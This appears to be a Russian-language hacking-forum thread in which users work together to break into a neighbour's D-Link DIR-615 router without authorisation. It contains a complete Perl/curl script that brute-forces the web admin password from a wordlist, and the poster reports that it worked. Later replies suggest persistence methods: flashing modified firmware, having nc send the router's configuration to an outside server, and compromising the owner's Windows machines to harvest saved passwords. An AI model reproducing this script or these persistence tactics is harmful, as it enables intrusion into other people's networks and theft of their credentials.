Брут роутера с помощью thc-hydra (мануал для новичков)

Ситуация такая стоит роутер домашний он натравлен на этот D-link но проблема состоит в том что данный роутер выставлен на автоматическую смену канала , а мой ZyXel не переключает заним.Приходиться постояно лазить на мой роутер и натравливаь на нужный канал.... а D-link с открытым доступом и скрытй , но вот веб морда неподдаеться на перебор ....

 

Доброго времени суток господа!!! Вот я сделал скрины так что надеюсь вы ткнете носом в мои косяки и что я делаю не так ....
И так поехал: Имеется в на повестке дня такой вот зверь.

включив все что нужно мы начинаем разгон и вводим ему логин и пароль (от балды), и получаем вот такой вот список скриптов. вот он:

далее нажимаем на index.cgi и видим там такое:

идем дальше:

и тут вопрос ключом для отрицательной авторизации будет я вляться что?
есть еще вот такой вариант для отрицательной авторизации:

как то так.....
прошу не пинать за мои не очень огромные познания...

 

А вот скрины что мне говорит Nmap и Hydra:

перебор на Telnet идет нормально но вот как мне объяснили месные комрады, что пароль от веб морды и от Telnet разные .... незнаю можно ли через telnet посмотреть пароль админа ....
вообщем основной затык встал на Гидре так как сформировать строку авторизации для гидры я так и не смог.


вообщем что то идет не так , а скорее всего я что -то делаю не так ...вот и прошу совета.
По поводу Router Scan'a... ммм он мне ничего не сказал вообще ...вот скрин:

нужный мне роутер висит на 192.168.0.1 а тот что 192.168.1.1 это мой .... а 192.168.4.1 тоже длинк но там другая история ))))
Такие вот пироги жду ваших советов ,критики, и тыканья носом в мои ошибки....

 

> v2.47

Обновитесь до последней, эта версия устарела уже.

И рекомендую отключить необязательные модули сканирования, т.к. для данной задачи они не требуются.

 

Ничего не изменилось...(только вместо названия на 192.168.4.1 выплюнул название и версию прошивки роутера)..
А все остальные позиции остались пустыми.
как то так

 

Да, парсинг D-Link был улучшен.

Но данных нет, значит стандартные пароли были изменены.

 

У меня есть скрипт, который подбирает пароль к dir-615, но он для серебристой вэб-морды. Чтобы проверить на совместимость, попробуйте:

Code:

curl -A "Mozilla 5.0"  -b "cookie_lang=rus; client_login=admin; client_password=123456" --connect-timeout 55  --max-time 55 -L -s  "http://192.168.0.1:80/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0"

на выходе должно быть {auth: false}
Upd:
Проверил на роутере с мордой аналогичной вашему, работает. Сохранить в файл 615.pl, в строке 4 прописать название файла с паролями (формат: одна строка - один пароль). Запускать так: perl 615.pl
Требуется сurl для работы.

Spoiler: что примерно ожидается на выходе:

[-] [123456] invalid
[-] [1234567] invalid
[-] [51234567] invalid
[-] [r51234567] invalid
[+] [password]

Spoiler: код

Code:

$ip="192.168.0.1";
$port="80";
$login="admin";
$file="paswords.txt";

open IN, $file or die $!;
while(<IN>){
    s/[\r\n]+$//;
    $pass=$_;
    while(1){
        $html=`curl -A "Mozilla 5.0" -b "cookie_lang=rus; client_login=$login; client_password=$pass" --connect-timeout 55  --max-time 55 -L -s  "http://$ip:$port/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0"`;
        if($html=~/auth\:\s*true/){
            print "[+] [$pass]\n";
            die;
        }
        elsif($html=~/auth\:\s*false/){
            print "[-] [$pass] invalid\n";
            last;
        }
        else{
            print "[-] [$pass] request error\n";
            sleep 5;
        }
    }
}
close IN;

 

То что стандартные пароли были заменены я был вкурсе в самом начале...первым делом проверил...

За скрипт огромное спасибо !!!!! Вроде подошел для данного зверя.... остается только ждать и верить в лучшее.....

Если автор скрипта не против то я бы порекомендовал повесить данный скрипт в шапку темы....
Опять же с разрешения автора скрипта или VasiliyP.

 

Спасибо за скрипт!!!
вот что за зверь :

победил я этого зверя!!! если что за темой буду следить дома и на работе огромный выбор роутеров всех цветов и оттенков...буду проверять все на собственном опыте...

 

Меня интересует еще один вопрос , прошу сразу прощения что может он прозвучит не по теме, но все же:
Получилось у нас поиметь полный контроль на данном роутере, но вот при смене пароля на wifi и веб морде лишит нас всего просто за секунду... а шли мы к власти очень и очень долго.....Так вот каким макаром можно сделать чтобы при смене пароля роутер либо оставлял черный ход или сам отсылал на почту нужную инфу ??? может это все на гране фантастики но все же за спрос вроде не бьют .

 

1. Модификация ПО роутера
2. Прошивка роутера модифицированным ПО

Далеко не фантастика. Однако есть определённые условия для выполнимости миссии - прошивка должна быть открыта, либо в крайнем случае, утилиты для работы с прошивками должны её обрабатывать.

А дальше всё сводится к изучению того, что уже есть в прошивке, и к написанию своего программного кода. Естественно это непростая задача, но в то же время в какой-то мере выполнимая.

В реальности же проще захватить клиентские устройства хозяина точки (под управлением Windows, другие сложнее), и искать в сохранённых паролях.

 

Доброго времени суток !!!! Прошу помощи у местных комрадов!!!
залез я на роутер D-link dir-615 но есть одно НО!!!! сделать я ничего не могу...При самом старте после аунтефикации висит надпись "Конфигурация устройства изменена"
далее я полез во вкладку настройки вручную => wifi => общие настройки и увидел следующее:

роутер вообще не должен светиться в эфире , но нет он прекрасно работает и фунциклирует.... и пройдя по всем вкладкам язаметил что они все пустые в основном.....
отсюда зреет вопрос КАК ТАК ТО!!!! перейдя во вкладку система я нашел вкладку Пароль администратора => Установка системного пароля . И тут только один пользователь администратор....
Я то думал может на данном роутере есть несколько учеток (Администратор и Гость), но нет....
Пробовал заходить как через роутер свой (Комп - LAN - Мой роутер - Wifi - D-link 615) так и на прямую (Комп - wifi - D-link 615), но картина осталась прежней....
Отсюда вопрос что не так и что я проглядел..

 

Возможно какие-то ошибки JavaScript в интерфейсе, попробуйте открыть другим браузером.

Попробуйте снова отсканировать Router Scan'ом, но при этом укажите найденный пароль в опции "Use credentials". Интересно что он покажет при таком раскладе.

 

Пробовал 3 штуки мозила ,хром и эксплоер.. результат один и тот же....
вот что говорит Router Scan


Что-то мне подсказывает что данный роутер работает как ретронслятор.....
Проверил прогой которая показывает все устройства в данной подсети .... все вроде бы норм ..висит один комп и два телефона..(ком не мой)..

 

Даже если так, данные по идее должны были прийти. Как мне кажется, что-то с прошивкой. А может перезагрузить его надо (но я бы не стал, мало ли что у него в мозгах, главное есть линк).

 

Я уже перезагружал его...думал что то наладиться ,но увы.....
Суть проблемы такова: один день он работает нормально(инет летит и все гуд), а на следующий день заходишь в браузер а там кукишь ... Случайно заметил что при таком раскладе работает торрент клиенты )... почесав репу запусти браузер тор и все тоже работает ,ну браузер тор и торрент , а вот приложения которым нужен нормальный инет не робит.... вот и хотел выяснить что к чему и почему ))
При таком раскладе может кто посоветует как пустить мой ящик а точнее всю винду по такому пути...я так понял нужен какой то VPNклиент... хотелось бы подробностей

 

Это похоже на проблему с DNS сервером роутера/или провайдера. Пробуйте какой-нибудь внешний, типа 8.8.8.8 . Если не поможет - то надо wireshark`ом смотреть кто и что там режет.
А по поводу "каким макаром можно сделать чтобы при смене пароля роутер либо оставлял черный ход или сам отсылал на почту нужную инфу" - я тут вижу провайдеры на такой ставят кастомную прошивку, стало быть она без проблем разбирается/собирается. Там внутри есть утилита nc - можно после ребута (или по расписанию) конфиг отправлять на свой сервер, можно wps принудительно настраивать, если шифрование включено, да наверное много чего еще можно придумать.

 

Все это понятно что DNS режут проблема в другом я с роутером ничего сделать не могу...Все мои действия не как не сохраняються ...Я вот с этим разобраться немогу.

 

Через telnet тогда с этим же паролем. И смотрите команду nvram. Еще я тут вижу *.json файлы, тоже конфиг, но походу это не родное.

 

Хотелось бы уточнить что мне смотреть... точнее что искать в телнете ?
а по поводу вайла *.json вы хотите сказать что даныйы роутер , а точнее его разум пересобрали?


пароль на telnet не подходит....
И слить резервную копию прошивки с утройства тоже не могу ,т.к. Веб интерфейс в каком то глубоком куматозе (ничего не делает)....